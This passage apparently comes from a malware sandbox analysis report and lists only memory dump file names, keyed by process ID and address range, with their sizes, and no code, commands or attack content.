                                                                                                    • memory/3592-43-0x00000000004D0000-0x0000000000B7A000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.7MB

                                                                                                    • memory/3868-370-0x0000000000900000-0x0000000000FAA000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.7MB

                                                                                                    • memory/3868-358-0x0000000000900000-0x0000000000FAA000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.7MB

                                                                                                    • memory/4060-342-0x0000000000DE0000-0x0000000001296000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.7MB

                                                                                                    • memory/4060-346-0x0000000000DE0000-0x0000000001296000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.7MB

                                                                                                    • memory/4168-515-0x0000018656850000-0x0000018656876000-memory.dmp

                                                                                                      Filesize

                                                                                                      152KB

                                                                                                    • memory/4168-659-0x0000018657CF0000-0x0000018657D9A000-memory.dmp

                                                                                                      Filesize

                                                                                                      680KB

                                                                                                    • memory/4168-512-0x0000018656820000-0x0000018656842000-memory.dmp

                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/4168-511-0x00000186567D0000-0x0000018656820000-memory.dmp

                                                                                                      Filesize

                                                                                                      320KB

                                                                                                    • memory/4168-510-0x0000018656720000-0x00000186567D2000-memory.dmp

                                                                                                      Filesize

                                                                                                      712KB

                                                                                                    • memory/4168-508-0x00000186564B0000-0x000001865651A000-memory.dmp

                                                                                                      Filesize

                                                                                                      424KB

                                                                                                    • memory/4168-535-0x00000186568F0000-0x0000018656902000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/4168-516-0x00000186575C0000-0x00000186578EE000-memory.dmp

                                                                                                      Filesize

                                                                                                      3.2MB

                                                                                                    • memory/4168-514-0x0000018656890000-0x00000186568CA000-memory.dmp

                                                                                                      Filesize

                                                                                                      232KB

                                                                                                    • memory/4256-676-0x0000000000730000-0x0000000000BC2000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.6MB

                                                                                                    • memory/4256-673-0x0000000000730000-0x0000000000BC2000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.6MB

                                                                                                    • memory/4428-544-0x0000000007920000-0x0000000007942000-memory.dmp

                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/4428-543-0x0000000007990000-0x0000000007A26000-memory.dmp

                                                                                                      Filesize

                                                                                                      600KB

                                                                                                    • memory/4736-656-0x0000000000B30000-0x0000000000FC6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.6MB

                                                                                                    • memory/4736-658-0x0000000000B30000-0x0000000000FC6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.6MB

                                                                                                    • memory/4760-638-0x00000000008E0000-0x0000000001498000-memory.dmp

                                                                                                      Filesize

                                                                                                      11.7MB

                                                                                                    • memory/4760-677-0x00000000008E0000-0x0000000001498000-memory.dmp

                                                                                                      Filesize

                                                                                                      11.7MB

                                                                                                    • memory/4760-674-0x00000000008E0000-0x0000000001498000-memory.dmp

                                                                                                      Filesize

                                                                                                      11.7MB

                                                                                                    • memory/4760-710-0x00000000008E0000-0x0000000001498000-memory.dmp

                                                                                                      Filesize

                                                                                                      11.7MB

                                                                                                    • memory/4864-129-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                      Filesize

                                                                                                      380KB

                                                                                                    • memory/4864-127-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                      Filesize

                                                                                                      380KB

                                                                                                    • memory/4892-570-0x00000000006C0000-0x0000000000770000-memory.dmp

                                                                                                      Filesize

                                                                                                      704KB

                                                                                                    • memory/4928-386-0x000001A1C8110000-0x000001A1C811A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/4928-378-0x000001A1C7700000-0x000001A1C7CA4000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.6MB

                                                                                                    • memory/4928-384-0x000001A1E21A0000-0x000001A1E2216000-memory.dmp

                                                                                                      Filesize

                                                                                                      472KB

                                                                                                    • memory/4928-385-0x000001A1C80F0000-0x000001A1C810E000-memory.dmp

                                                                                                      Filesize

                                                                                                      120KB

                                                                                                    • memory/4936-692-0x00000000003E0000-0x0000000000880000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.6MB

                                                                                                    • memory/4936-693-0x00000000003E0000-0x0000000000880000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.6MB

                                                                                                    • memory/5028-412-0x0000000005B60000-0x0000000005BC6000-memory.dmp

                                                                                                      Filesize

                                                                                                      408KB

                                                                                                    • memory/5028-411-0x0000000005AF0000-0x0000000005B56000-memory.dmp

                                                                                                      Filesize

                                                                                                      408KB

                                                                                                    • memory/5028-441-0x00000000066F0000-0x000000000670A000-memory.dmp

                                                                                                      Filesize

                                                                                                      104KB

                                                                                                    • memory/5028-407-0x0000000004C20000-0x0000000004C56000-memory.dmp

                                                                                                      Filesize

                                                                                                      216KB

                                                                                                    • memory/5028-408-0x0000000005410000-0x0000000005A38000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.2MB

                                                                                                    • memory/5028-440-0x0000000007930000-0x0000000007FAA000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.5MB

                                                                                                    • memory/5028-425-0x0000000006240000-0x000000000628C000-memory.dmp

                                                                                                      Filesize

                                                                                                      304KB

                                                                                                    • memory/5028-424-0x00000000061F0000-0x000000000620E000-memory.dmp

                                                                                                      Filesize

                                                                                                      120KB

                                                                                                    • memory/5028-409-0x0000000005220000-0x0000000005242000-memory.dmp

                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/5028-423-0x0000000005BF0000-0x0000000005F44000-memory.dmp

                                                                                                      Filesize

                                                                                                      3.3MB

                                                                                                    • memory/5088-216-0x0000000000400000-0x000000000045B000-memory.dmp

                                                                                                      Filesize

                                                                                                      364KB

                                                                                                    • memory/5088-214-0x0000000000400000-0x000000000045B000-memory.dmp

                                                                                                      Filesize

                                                                                                      364KB

                                                                                                    • memory/5100-212-0x0000000000D90000-0x0000000000E3C000-memory.dmp

                                                                                                      Filesize

                                                                                                      688KB

                                                                                                    • memory/5108-712-0x00000000008E0000-0x0000000001498000-memory.dmp

                                                                                                      Filesize

                                                                                                      11.7MB

                                                                                                    • memory/5108-741-0x00000000008E0000-0x0000000001498000-memory.dmp

                                                                                                      Filesize

                                                                                                      11.7MB

                                                                                                    • memory/6464-1785-0x00000000001D0000-0x000000000022C000-memory.dmp

                                                                                                      Filesize

                                                                                                      368KB

                                                                                                    • memory/7272-1516-0x0000000000DE0000-0x0000000000E40000-memory.dmp

                                                                                                      Filesize

                                                                                                      384KB

                                                                                                    • memory/7356-1658-0x0000000005920000-0x0000000005C74000-memory.dmp

                                                                                                      Filesize

                                                                                                      3.3MB

                                                                                                    • memory/7356-1724-0x0000000006580000-0x00000000065CC000-memory.dmp

                                                                                                      Filesize

                                                                                                      304KB